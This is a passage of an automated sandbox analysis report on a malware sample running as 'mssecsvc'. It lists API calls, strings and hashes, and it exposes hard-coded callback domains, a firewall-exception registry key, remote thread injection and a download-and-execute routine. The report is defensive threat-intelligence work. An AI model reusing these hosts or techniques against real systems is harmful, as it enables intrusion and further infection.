                                                                                • Instruction ID: 1da76589fb4dd87b5df105d6ae65f4369b8eb418b0376c81cadce6663e0d34e8
                                                                                • Opcode Fuzzy Hash: ddb8fe4bd5fdd210e26ff7bad9c73aa659b133641d5d7bf307872437a698338a
                                                                                • Instruction Fuzzy Hash: 1391EC71508348BEEB229F348859BEE7FAEEF41304F000648E85A9E191C3F66F45DB65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(00B93F83), ref: 00B93F8F
                                                                                • WSAStartup.WS2_32(00000101), ref: 00B93FCE
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00B93FE9
                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 00B93FF2
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00B93FFF
                                                                                • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00B94057
                                                                                • gethostbyname.WS2_32(ilo.brenz.pl), ref: 00B94066
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 00B94097
                                                                                • connect.WS2_32(6F6C6902,00B93B09,00000010), ref: 00B940B1
                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 00B940FB
                                                                                • wsprintfA.USER32 ref: 00B94179
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00B941B4
                                                                                • CloseHandle.KERNEL32(?,00000000,6F6C6902,00B96AA2,00000000,00000000), ref: 00B941BD
                                                                                • GetTickCount.KERNEL32 ref: 00B941F6
                                                                                • RtlExitUserThread.NTDLL(00000000), ref: 00B94322
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Similarity
                                                                                • API ID: CreateThread$CloseHandle$CountEventExitLibraryLoadStartupTickUserVersionconnectgethostbynamelstrlensocketwsprintf
                                                                                • String ID: C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$ilo.brenz.pl
                                                                                • API String ID: 3316401344-1341573493
                                                                                • Opcode ID: ddb8fe4bd5fdd210e26ff7bad9c73aa659b133641d5d7bf307872437a698338a
                                                                                • Instruction ID: e1499c7a4c9dfb18f853e2662a19a3ad779620544526f79d38743789921cc4dc
                                                                                • Opcode Fuzzy Hash: ddb8fe4bd5fdd210e26ff7bad9c73aa659b133641d5d7bf307872437a698338a
                                                                                • Instruction Fuzzy Hash: 7091B731518248BAEF319F34881DBAA7BADEF46300F0446A8E95A9E181C3F45F46CB65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(7FEA3EA9), ref: 7FEA3EB5
                                                                                  • Part of subcall function 7FEA3ECC: GetProcAddress.KERNEL32(00000000,7FEA3EC0), ref: 7FEA3ECD
                                                                                  • Part of subcall function 7FEA3ECC: GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,000000C8), ref: 7FEA3EE2
                                                                                  • Part of subcall function 7FEA3ECC: wsprintfA.USER32 ref: 7FEA3EF7
                                                                                  • Part of subcall function 7FEA3ECC: CreateThread.KERNEL32(00000000,00000000,7FEA3691,00000000,00000000), ref: 7FEA3F40
                                                                                  • Part of subcall function 7FEA3ECC: CloseHandle.KERNEL32(?,6EF1083C), ref: 7FEA3F49
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
                                                                                • connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
                                                                                • wsprintfA.USER32 ref: 7FEA4179
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Similarity
                                                                                • API ID: Create$CloseHandleThreadwsprintf$AddressEventFileLibraryLoadModuleNameProcVersionconnectsocket
                                                                                • String ID: C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 4150863296-2871364490
                                                                                • Opcode ID: f1d84134fe036aa05b481be4a2e3cefd3da6a37580bded02df9d0a272a27228e
                                                                                • Instruction ID: a15a6457230e598bb6ef6cbbffa0e8635eaa4eb844119d8f0639b47af27d7a61
                                                                                • Opcode Fuzzy Hash: f1d84134fe036aa05b481be4a2e3cefd3da6a37580bded02df9d0a272a27228e
                                                                                • Instruction Fuzzy Hash: A3A1FF71419348BFEB219F348C49BFA7BACEF41304F004659E84A9E092D6F66F05C7A2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(00B93EA9), ref: 00B93EB5
                                                                                  • Part of subcall function 00B93ECC: GetProcAddress.KERNEL32(00000000,00B93EC0), ref: 00B93ECD
                                                                                  • Part of subcall function 00B93ECC: GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,000000C8), ref: 00B93EE2
                                                                                  • Part of subcall function 00B93ECC: wsprintfA.USER32 ref: 00B93EF7
                                                                                  • Part of subcall function 00B93ECC: CreateThread.KERNEL32(00000000,00000000,00B93691,00000000,00000000), ref: 00B93F40
                                                                                  • Part of subcall function 00B93ECC: CloseHandle.KERNEL32(?,6EF1083C), ref: 00B93F49
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00B93FE9
                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 00B93FF2
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00B93FFF
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 00B94097
                                                                                • connect.WS2_32(6F6C6902,00B93B09,00000010), ref: 00B940B1
                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 00B940FB
                                                                                • wsprintfA.USER32 ref: 00B94179
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Similarity
                                                                                • API ID: Create$CloseHandleThreadwsprintf$AddressEventFileLibraryLoadModuleNameProcVersionconnectsocket
                                                                                • String ID: C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 4150863296-2871364490
                                                                                • Opcode ID: f1d84134fe036aa05b481be4a2e3cefd3da6a37580bded02df9d0a272a27228e
                                                                                • Instruction ID: bb5e24d1dd9fef075b998dd97aa8f82625ae5d5d32f963d553afe18280bc9283
                                                                                • Opcode Fuzzy Hash: f1d84134fe036aa05b481be4a2e3cefd3da6a37580bded02df9d0a272a27228e
                                                                                • Instruction Fuzzy Hash: EFA1EE71418258BFEF219F248C5ABEA7BECEF42300F0445A9E8499E082D3F45F46C7A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,7FEA3EC0), ref: 7FEA3ECD
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,000000C8), ref: 7FEA3EE2
                                                                                • wsprintfA.USER32 ref: 7FEA3EF7
                                                                                • CreateThread.KERNEL32(00000000,00000000,7FEA3691,00000000,00000000), ref: 7FEA3F40
                                                                                • CloseHandle.KERNEL32(?,6EF1083C), ref: 7FEA3F49
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
                                                                                  • Part of subcall function 7FEA3405: NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FEA344A
                                                                                  • Part of subcall function 7FEA3405: NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FEA3469
                                                                                  • Part of subcall function 7FEA3405: MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FEA3493
                                                                                  • Part of subcall function 7FEA3405: CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FEA34A0
                                                                                  • Part of subcall function 7FEA3405: UnmapViewOfFile.KERNEL32(?), ref: 7FEA34B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateFileHandle$ThreadView$AddressEventInformationModuleNameOpenProcQuerySectionSystemUnmapwsprintf
                                                                                • String ID: C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 541178049-2871364490
                                                                                • Opcode ID: 93ed13287a7bd2140dafd5b4f212b57c54acf0fe28af45ebd9ce4fa85cb1ab7f
                                                                                • Instruction ID: d9e398f0cb57442fd0ba00def27d3fe33590f3ea382637dc010686527708efc5
                                                                                • Opcode Fuzzy Hash: 93ed13287a7bd2140dafd5b4f212b57c54acf0fe28af45ebd9ce4fa85cb1ab7f
                                                                                • Instruction Fuzzy Hash: 65A10071408348BFEB219F348C49BEA7BACEF81304F004659E84A9E091D7F66F05C7A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,00B93EC0), ref: 00B93ECD
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,000000C8), ref: 00B93EE2
                                                                                • wsprintfA.USER32 ref: 00B93EF7
                                                                                • CreateThread.KERNEL32(00000000,00000000,00B93691,00000000,00000000), ref: 00B93F40
                                                                                • CloseHandle.KERNEL32(?,6EF1083C), ref: 00B93F49
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00B93FE9
                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 00B93FF2
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00B93FFF
                                                                                  • Part of subcall function 00B93405: NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00B9344A
                                                                                  • Part of subcall function 00B93405: NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00B93469
                                                                                  • Part of subcall function 00B93405: MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00B93493
                                                                                  • Part of subcall function 00B93405: CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00B934A0
                                                                                  • Part of subcall function 00B93405: UnmapViewOfFile.KERNEL32(?), ref: 00B934B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateFileHandle$ThreadView$AddressEventInformationModuleNameOpenProcQuerySectionSystemUnmapwsprintf
                                                                                • String ID: C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 541178049-2871364490
                                                                                • Opcode ID: 93ed13287a7bd2140dafd5b4f212b57c54acf0fe28af45ebd9ce4fa85cb1ab7f
                                                                                • Instruction ID: 1083ece6e13a7a8e23546d8e0b8bd45fe0739b409a22a6c9ae18efa0d286fac8
                                                                                • Opcode Fuzzy Hash: 93ed13287a7bd2140dafd5b4f212b57c54acf0fe28af45ebd9ce4fa85cb1ab7f
                                                                                • Instruction Fuzzy Hash: 75A1DF71518258BFEF219F248C5EBEA7BECEF42300F0446A9E8499E082D3F45F468765
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(7FEA3F54), ref: 7FEA3F60
                                                                                  • Part of subcall function 7FEA3F8F: LoadLibraryA.KERNEL32(7FEA3F83), ref: 7FEA3F8F
                                                                                  • Part of subcall function 7FEA3F8F: WSAStartup.WS2_32(00000101), ref: 7FEA3FCE
                                                                                  • Part of subcall function 7FEA3F8F: CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
                                                                                  • Part of subcall function 7FEA3F8F: CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
                                                                                  • Part of subcall function 7FEA3F8F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
                                                                                  • Part of subcall function 7FEA3F8F: socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
                                                                                  • Part of subcall function 7FEA3F8F: connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
                                                                                  • Part of subcall function 7FEA3F8F: GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
                                                                                • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 7FEA4057
                                                                                • gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FEA4066
                                                                                • wsprintfA.USER32 ref: 7FEA4179
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 7FEA41B4
                                                                                • CloseHandle.KERNEL32(?,00000000,6F6C6902,7FEA6AA2,00000000,00000000), ref: 7FEA41BD
                                                                                • GetTickCount.KERNEL32 ref: 7FEA41F6
                                                                                Strings
                                                                                • C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe, xrefs: 7FEA4195, 7FEA41DB
                                                                                • C:\WINDOWS\TASKSCHE.EXE, xrefs: 7FEA41DA
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Similarity
                                                                                • API ID: Create$CloseHandleLibraryLoadThread$CountEventStartupTickVersionconnectgethostbynamelstrlensocketwsprintf
                                                                                • String ID: C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE
                                                                                • API String ID: 2996464229-2519926966
                                                                                • Opcode ID: 3a46fe8949218d8fc9384494124be36ff555b877cdb5172203310d60a3e128ac
                                                                                • Instruction ID: 9d7a0edf8395d02bdb3222331a00bfe847c5167623d17b4b3927ccf0a8489e01
• Opcode Fuzzy Hash: 3a46fe8949218d8fc9384494124be36ff555b877cdb5172203310d60a3e128ac
• Instruction Fuzzy Hash: 5381FE71508388BFEB228F348C59BEA7BADEF41304F040659E84A9E091C7F66F45C762
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(00B93F54), ref: 00B93F60
  • Part of subcall function 00B93F8F: LoadLibraryA.KERNEL32(00B93F83), ref: 00B93F8F
  • Part of subcall function 00B93F8F: WSAStartup.WS2_32(00000101), ref: 00B93FCE
  • Part of subcall function 00B93F8F: CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00B93FE9
  • Part of subcall function 00B93F8F: CloseHandle.KERNEL32(?,00000000), ref: 00B93FF2
  • Part of subcall function 00B93F8F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00B93FFF
  • Part of subcall function 00B93F8F: socket.WS2_32(00000002,00000001,00000000), ref: 00B94097
  • Part of subcall function 00B93F8F: connect.WS2_32(6F6C6902,00B93B09,00000010), ref: 00B940B1
  • Part of subcall function 00B93F8F: GetVersionExA.KERNEL32(?,?,00000000), ref: 00B940FB
• lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00B94057
• gethostbyname.WS2_32(ilo.brenz.pl), ref: 00B94066
• wsprintfA.USER32 ref: 00B94179
• CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00B941B4
• CloseHandle.KERNEL32(?,00000000,6F6C6902,00B96AA2,00000000,00000000), ref: 00B941BD
• GetTickCount.KERNEL32 ref: 00B941F6
Strings
• C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe, xrefs: 00B94195, 00B941DB
• C:\WINDOWS\TASKSCHE.EXE, xrefs: 00B941DA
Memory Dump Source
• Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: Create$CloseHandleLibraryLoadThread$CountEventStartupTickVersionconnectgethostbynamelstrlensocketwsprintf
• String ID: C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE
• API String ID: 2996464229-2519926966
• Opcode ID: 3a46fe8949218d8fc9384494124be36ff555b877cdb5172203310d60a3e128ac
• Instruction ID: 987ff6dac46bd9fd065c36dfeb2bbbd91a942f1947beaaf49b45af3fc6a0b3e4
• Opcode Fuzzy Hash: 3a46fe8949218d8fc9384494124be36ff555b877cdb5172203310d60a3e128ac
• Instruction Fuzzy Hash: 0281DF71518258BFEF219F348859BEA7FECEF42300F0446A9E8599E182C3F45F468762
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetSystemTime.KERNEL32(7FEA7584), ref: 7FEA389F
• Sleep.KERNEL32(0000EA60), ref: 7FEA3911
• InternetGetConnectedState.WININET(?,00000000), ref: 7FEA392A
• gethostbyname.WS2_32(0D278125), ref: 7FEA396C
• socket.WS2_32(00000002,00000001,00000000), ref: 7FEA3981
• ioctlsocket.WS2_32(?,8004667E), ref: 7FEA399A
• connect.WS2_32(?,?,00000010), ref: 7FEA39B3
• Sleep.KERNEL32(?,00000010,BB010002,00000000,8004667E,?,00000001), ref: 7FEA39C1
• closesocket.WS2_32 ref: 7FEA3A20
Strings
Memory Dump Source
• Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: Sleep$ConnectedInternetStateSystemTimeclosesocketconnectgethostbynameioctlsocketsocket
• String ID: foefmh.com
• API String ID: 159131500-183919301
• Opcode ID: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
• Instruction ID: 863d8d36320b09296de0ef8eaaf11b1bc77ac7fb125708de1e92797cd0aa2464
• Opcode Fuzzy Hash: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
• Instruction Fuzzy Hash: 4641C531604348BEDB218F208C49BE9BB6EEF85714F004159F90AEE1C1DBF79B409720
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 7FEA144A: LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 7FEA145A
  • Part of subcall function 7FEA144A: NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 7FEA146A
• CloseHandle.KERNEL32(?), ref: 7FEA05AD
• FreeLibrary.KERNEL32(73E60000,?,7FEA079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA07B8
• CloseHandle.KERNEL32(?,?,7FEA079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA07BF
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 7FEA07C9
• Process32First.KERNEL32 ref: 7FEA07DC
• Process32Next.KERNEL32 ref: 7FEA07ED
• OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA0805
• CreateRemoteThread.KERNEL32(?,00000000,00000000,-00003C38,00000002,00000000), ref: 7FEA0842
• CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA085D
• CloseHandle.KERNEL32 ref: 7FEA086C
Strings
Memory Dump Source
• Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: CloseHandle$CreateProcess32$AdjustFirstFreeLibraryLookupNextOpenPrivilegePrivilegesProcessRemoteSnapshotThreadTokenToolhelp32Value
• String ID: csrs
• API String ID: 3908997113-2321902090
• Opcode ID: cb63e8b7f3a99e4be573476feab88a83968f02cd0365d5f729e494595204ac2c
• Instruction ID: 84bb5cd5c05f80c9023c3546aa49ac891d3b4ee2c4a24ef2c536b510610674c9
• Opcode Fuzzy Hash: cb63e8b7f3a99e4be573476feab88a83968f02cd0365d5f729e494595204ac2c
• Instruction Fuzzy Hash: 59113D30502205BBEB255F31CD49BBF3A6DEF44711F00016CFE4B9E081DAB69B018AAA
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetTempPathA.KERNEL32(00000104), ref: 7FEA278C
  • Part of subcall function 7FEA27A7: GetTempFileNameA.KERNEL32(?,7FEA27A3,00000000,?), ref: 7FEA27A8
  • Part of subcall function 7FEA27A7: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27C3
  • Part of subcall function 7FEA27A7: InternetReadFile.WININET(?,?,00000104), ref: 7FEA27DD
  • Part of subcall function 7FEA27A7: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27F3
  • Part of subcall function 7FEA27A7: CloseHandle.KERNEL32(?,00000104,?,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27FF
  • Part of subcall function 7FEA27A7: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,7FEA27A3), ref: 7FEA2823
  • Part of subcall function 7FEA27A7: InternetCloseHandle.WININET(?), ref: 7FEA2833
• InternetCloseHandle.WININET(00000000), ref: 7FEA283A
Memory Dump Source
• Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: File$CloseHandleInternet$CreateTemp$NamePathProcessReadWrite
• String ID:
• API String ID: 1995088466-0
• Opcode ID: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
• Instruction ID: c1ca02f886126752e6f21441145c1cc666a01a53b77e18b91c733c89828b9d16
• Opcode Fuzzy Hash: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
• Instruction Fuzzy Hash: A821C0B1145306BFE7215A20CC8AFFF3A6DEF95B10F000119FA4AAD081D7B29B15C6A6
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetTempPathA.KERNEL32(00000104), ref: 00B9278C
  • Part of subcall function 00B927A7: GetTempFileNameA.KERNEL32(?,00B927A3,00000000,?), ref: 00B927A8
  • Part of subcall function 00B927A7: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,00B927A3,00000000,?), ref: 00B927C3
  • Part of subcall function 00B927A7: InternetReadFile.WININET(?,?,00000104), ref: 00B927DD
  • Part of subcall function 00B927A7: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,00B927A3,00000000,?), ref: 00B927F3
  • Part of subcall function 00B927A7: CloseHandle.KERNEL32(?,00000104,?,00000000,?,00B927A3,00000000,?), ref: 00B927FF
  • Part of subcall function 00B927A7: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,00B927A3), ref: 00B92823
  • Part of subcall function 00B927A7: InternetCloseHandle.WININET(?), ref: 00B92833
• InternetCloseHandle.WININET(00000000), ref: 00B9283A
Memory Dump Source
• Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: File$CloseHandleInternet$CreateTemp$NamePathProcessReadWrite
• String ID:
• API String ID: 1995088466-0
• Opcode ID: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
• Instruction ID: 3c979f55359ea05e8637edfd01210cb8f62386a64cc6d08a36a53dde9f200072
• Opcode Fuzzy Hash: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
• Instruction Fuzzy Hash: D121FDB1544206BFEB215B20CC8EFFF3A6CEF95B00F000568FA0999082D7B59E0586A6
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetTempFileNameA.KERNEL32(?,7FEA27A3,00000000,?), ref: 7FEA27A8
• CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27C3
• InternetReadFile.WININET(?,?,00000104), ref: 7FEA27DD
• WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27F3
• CloseHandle.KERNEL32(?,00000104,?,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27FF
• CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,7FEA27A3), ref: 7FEA2823
• InternetCloseHandle.WININET(?), ref: 7FEA2833
• InternetCloseHandle.WININET(00000000), ref: 7FEA283A
Memory Dump Source
• Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: File$CloseHandleInternet$Create$NameProcessReadTempWrite
• String ID:
• API String ID: 3452404049-0
• Opcode ID: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
• Instruction ID: 5e72b063bb693ddb0cec3f1fad15b0eca3dde0b314aeb166be0943229ddb0145
• Opcode Fuzzy Hash: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
• Instruction Fuzzy Hash: 56116DB1100606BBEB250B20CC4AFFB7A6DEF85B14F004519FA06AD080DBF5AB5196A8
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(01FBF7C4), ref: 7FEA113D
• GetProcAddress.KERNEL32(00000000,7FEA11D6), ref: 7FEA1148
Strings
Memory Dump Source
• Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
